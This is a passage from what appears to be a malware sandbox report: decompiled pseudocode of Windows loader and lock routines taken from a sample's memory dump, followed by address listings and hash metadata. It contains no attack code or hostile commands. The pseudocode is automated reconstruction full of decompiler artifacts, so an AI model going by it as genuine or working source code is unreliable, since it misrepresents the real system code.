								if( *((char*)(_t267 + 0xb)) != 0) {
									E01682280(_t134, 0x1758608);
									__eflags =  *0x1756e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0167FFB0(_t198, _t241, 0x1758608);
										__eflags = _t253;
										if(_t253 != 0) {
											L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1756e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1758608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01696B90(_t210,  &_v64);
										_t262 =  *0x1758608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0169E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E016A97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E016A006A(0x1758608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1758608);
												E016AB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1756904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1756e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0167FFB0(_t198, _t240, 0x1758608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E016A00C2(0x1758608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                    0x016920a0
                    0x016920a8
                    0x016920ad
                    0x016920b3
                    0x016920b8
                    0x016920c2
                    0x016920c7
                    0x016920cb
                    0x016920d2
                    0x01692263
                    0x01692266
                    0x016d5836
                    0x016d5836
                    0x00000000
                    0x0169226c
                    0x0169226c
                    0x01692270
                    0x01692274
                    0x016920e2
                    0x016920e2
                    0x016920e6
                    0x016920ee
                    0x016d57dc
                    0x016d57de
                    0x016d57ec
                    0x016d57ec
                    0x016d57f1
                    0x016d57f3
                    0x016d57f8
                    0x00000000
                    0x016d57f8
                    0x016d57e0
                    0x016d57e4
                    0x016d57ea
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016d57ea
                    0x016920f4
                    0x016920f4
                    0x016920f8
                    0x016920f8
                    0x016920fc
                    0x01692100
                    0x01692106
                    0x01692201
                    0x01692206
                    0x0169220b
                    0x0169220e
                    0x016922a9
                    0x016922ac
                    0x00000000
                    0x00000000
                    0x016922b2
                    0x016922b5
                    0x016d5801
                    0x016d5806
                    0x00000000
                    0x00000000
                    0x016d5810
                    0x016d5815
                    0x016d5818
                    0x00000000
                    0x00000000
                    0x016d581e
                    0x016922bb
                    0x016922bb
                    0x01692218
                    0x01692218
                    0x0169221c
                    0x01692220
                    0x01692222
                    0x016922c2
                    0x016922c4
                    0x016922dc
                    0x016922dc
                    0x016922e1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016922e7
                    0x016922c8
                    0x016922cd
                    0x016922d3
                    0x016922d6
                    0x016d5823
                    0x016d5825
                    0x016d5827
                    0x00000000
                    0x00000000
                    0x016d582d
                    0x00000000
                    0x016d582d
                    0x00000000
                    0x01692228
                    0x01692228
                    0x00000000
                    0x01692228
                    0x01692222
                    0x01692214
                    0x01692214
                    0x00000000
                    0x01692114
                    0x01692114
                    0x01692114
                    0x0169211a
                    0x0169211c
                    0x01692348
                    0x0169234d
                    0x016d5840
                    0x016d5845
                    0x016d5848
                    0x016d584e
                    0x016d584e
                    0x016d5848
                    0x01692353
                    0x01692355
                    0x01692388
                    0x01692388
                    0x01692368
                    0x0169236a
                    0x0169236c
                    0x0169238f
                    0x00000000
                    0x0169236e
                    0x0169236e
                    0x0169218e
                    0x0169218e
                    0x01692191
                    0x01692195
                    0x016d5a03
                    0x016d5a06
                    0x016d5a0c
                    0x016d5a0f
                    0x016d5a11
                    0x016d5a13
                    0x016d5a13
                    0x016d5a19
                    0x016d5a1f
                    0x00000000
                    0x0169219b
                    0x0169219b
                    0x016921a0
                    0x01692282
                    0x01692284
                    0x01692284
                    0x01692284
                    0x01692284
                    0x016921a6
                    0x016921a9
                    0x016921ac
                    0x016921ae
                    0x016921b3
                    0x0169228b
                    0x01692290
                    0x01692379
                    0x01692296
                    0x01692298
                    0x01692298
                    0x01692290
                    0x016921b9
                    0x016921be
                    0x016922a2
                    0x016922a2
                    0x016921c4
                    0x016921c8
                    0x016921cc
                    0x016921d0
                    0x016921d4
                    0x016921de
                    0x016921e3
                    0x016d5a29
                    0x016d5a2c
                    0x00000000
                    0x00000000
                    0x016d5a3b
                    0x00000000
                    0x016921e9
                    0x016921e9
                    0x016921e9
                    0x016921ee
                    0x016921f1
                    0x016d5a45
                    0x016d5a4b
                    0x016d5a52
                    0x016d5a58
                    0x016d5a5d
                    0x016d5a5f
                    0x016d5a71
                    0x016d5a61
                    0x016d5a6a
                    0x016d5a6a
                    0x016d5a76
                    0x016d5a79
                    0x016d5a7f
                    0x016d5a83
                    0x016d5a85
                    0x016d5a87
                    0x016d5a87
                    0x016d5a8c
                    0x016d5a91
                    0x016d5a97
                    0x016d5a9f
                    0x016d5aa0
                    0x016d5aa1
                    0x016d5aa6
                    0x016d5aab
                    0x016d5ab1
                    0x016d5ab3
                    0x016d5ab9
                    0x016d5aca
                    0x016d5ad4
                    0x016d5ad4
                    0x016d5ade
                    0x016d5ade
                    0x016d5aab
                    0x016d5a79
                    0x016d5a52
                    0x016921f7
                    0x016921f9
                    0x016921fe
                    0x016921fe
                    0x016921e3
                    0x01692195
                    0x0169236c
                    0x01692122
                    0x01692122
                    0x01692124
                    0x01692231
                    0x01692236
                    0x01692236
                    0x01692238
                    0x01692238
                    0x01692240
                    0x01692242
                    0x01692244
                    0x016d59fc
                    0x0169218c
                    0x0169218c
                    0x00000000
                    0x0169218c
                    0x0169224a
                    0x0169224f
                    0x01692256
                    0x01692304
                    0x01692309
                    0x0169230f
                    0x0169231e
                    0x0169231e
                    0x0169231e
                    0x01692320
                    0x01692325
                    0x0169232a
                    0x0169232c
                    0x0169233e
                    0x0169233e
                    0x00000000
                    0x0169232c
                    0x01692311
                    0x01692317
                    0x0169231a
                    0x0169231c
                    0x01692380
                    0x01692380
                    0x01692380
                    0x01692384
                    0x00000000
                    0x00000000
                    0x01692386
                    0x00000000
                    0x0169231c
                    0x0169225c
                    0x0169225c
                    0x00000000
                    0x0169225c
                    0x0169212a
                    0x01692134
                    0x01692138
                    0x0169213d
                    0x016d5858
                    0x016d5863
                    0x016d5863
                    0x016d5867
                    0x016d586a
                    0x00000000
                    0x00000000
                    0x016d586c
                    0x016d586c
                    0x016d5871
                    0x016d5875
                    0x016d5877
                    0x016d5997
                    0x016d599c
                    0x016d59a1
                    0x016d59a7
                    0x016d59a7
                    0x00000000
                    0x016d59a7
                    0x016d587d
                    0x00000000
                    0x016d588b
                    0x016d588b
                    0x016d5890
                    0x016d5892
                    0x016d5894
                    0x016d5899
                    0x016d589b
                    0x016d58a0
                    0x016d58a0
                    0x016d58aa
                    0x016d58b2
                    0x016d58b6
                    0x016d58be
                    0x016d58c6
                    0x016d58c9
                    0x016d590d
                    0x016d5917
                    0x016d591a
                    0x016d591c
                    0x016d5920
                    0x016d5928
                    0x016d592a
                    0x016d592c
                    0x016d592e
                    0x016d592e
                    0x016d58cb
                    0x016d58cd
                    0x016d58d8
                    0x016d58e0
                    0x016d58f4
                    0x016d58fe
                    0x016d58fe
                    0x016d593a
                    0x016d593e
                    0x016d5940
                    0x016d5942
                    0x00000000
                    0x016d5944
                    0x016d5944
                    0x016d5949
                    0x016d594e
                    0x016d594e
                    0x016d5953
                    0x016d595b
                    0x016d5976
                    0x016d5976
                    0x016d597a
                    0x016d597f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016d5981
                    0x016d5981
                    0x016d5981
                    0x016d5983
                    0x016d5988
                    0x016d598d
                    0x016d5991
                    0x016d5991
                    0x00000000
                    0x016d595d
                    0x016d595d
                    0x016d5963
                    0x016d5965
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016d5967
                    0x016d5967
                    0x016d596b
                    0x016d596d
                    0x00000000
                    0x00000000
                    0x016d596f
                    0x016d5971
                    0x016d5971
                    0x016d5974
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016d5974
                    0x00000000
                    0x016d5967
                    0x016d595b
                    0x016d5942
                    0x016d5863
                    0x01692143
                    0x01692143
                    0x01692149
                    0x0169214f
                    0x016922f1
                    0x016922f6
                    0x00000000
                    0x01692173
                    0x01692173
                    0x0169217d
                    0x01692181
                    0x01692186
                    0x016d59ae
                    0x016d59b2
                    0x016d59b5
                    0x016d59b7
                    0x016d59ba
                    0x016d59cd
                    0x016d59d1
                    0x016d59d5
                    0x016d59d9
                    0x016d59db
                    0x00000000
                    0x00000000
                    0x016d59dd
                    0x016d59dd
                    0x016d59e1
                    0x016d59e4
                    0x016d59e7
                    0x016d59ee
                    0x016d59ee
                    0x016d59f3
                    0x016d59f3
                    0x00000000
                    0x01692186
                    0x0169214f
                    0x01692106
                    0x01692266
                    0x016920d8
                    0x016920da
                    0x016920e0
                    0x00000000
                    0x00000000
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5cb07773ceb9673d9f4b950da77f129bb54e5a2beb6b176bdc3bf17d9c850881
                    • Instruction ID: 4b9f4d9b9b6904739ec9cd9e8aaebc953f3d315ddc0660836f3a07cd80c46063
                    • Opcode Fuzzy Hash: 5cb07773ceb9673d9f4b950da77f129bb54e5a2beb6b176bdc3bf17d9c850881
                    • Instruction Fuzzy Hash: 37F1E671A08341AFDB26CF2CCC5076B7BEAAF85324F08855DE9969B381D774D841CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0167D5E0 Relevance: .4, Instructions: 353COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 87%
                    			E0167D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x175d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E01676600(0x17552d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1757b9c; // 0x0
							_t281 = L01684620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E016AF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1757b90; // 0x77460000
								if(_t384 == 0) {
									_t353 =  *0x1757b8c; // 0x1202aa0
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01682280(_t200, 0x17584d8);
									_t277 =  *0x17585f4; // 0x1202f90
									_t351 =  *0x17585f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x1202f28
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0167FFB0(_t287, _t353, 0x17584d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E016BCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E01676600(0x17552d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E01677926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x175b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E016EE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1758472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x175b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x175b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01682280(_t250, 0x17584d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L016A3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0167FFB0(_t293, _t353, 0x17584d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E016A37F5(_t353, 0);
																}
																E016A0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01699B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E016902D6(_t174);
																}
																L016877F0( *0x1757b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0169C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0167EC7F(_t353);
										L016919B8(_t287, 0, _t353, 0);
										_t200 = E0166F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x175b2f8 |  *0x175b2fc) == 0 || ( *0x175b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E016AB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x175b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01716B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01716AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E0167E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L0167EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E016A9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E0167E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L01678F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E016A3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                    0x0167d5f2
                    0x0167d5f5
                    0x0167d5f5
                    0x0167d5fd
                    0x0167d600
                    0x0167d60a
                    0x0167d60d
                    0x0167d617
                    0x0167d61d
                    0x0167d627
                    0x0167d62e
                    0x0167d911
                    0x0167d913
                    0x00000000
                    0x0167d919
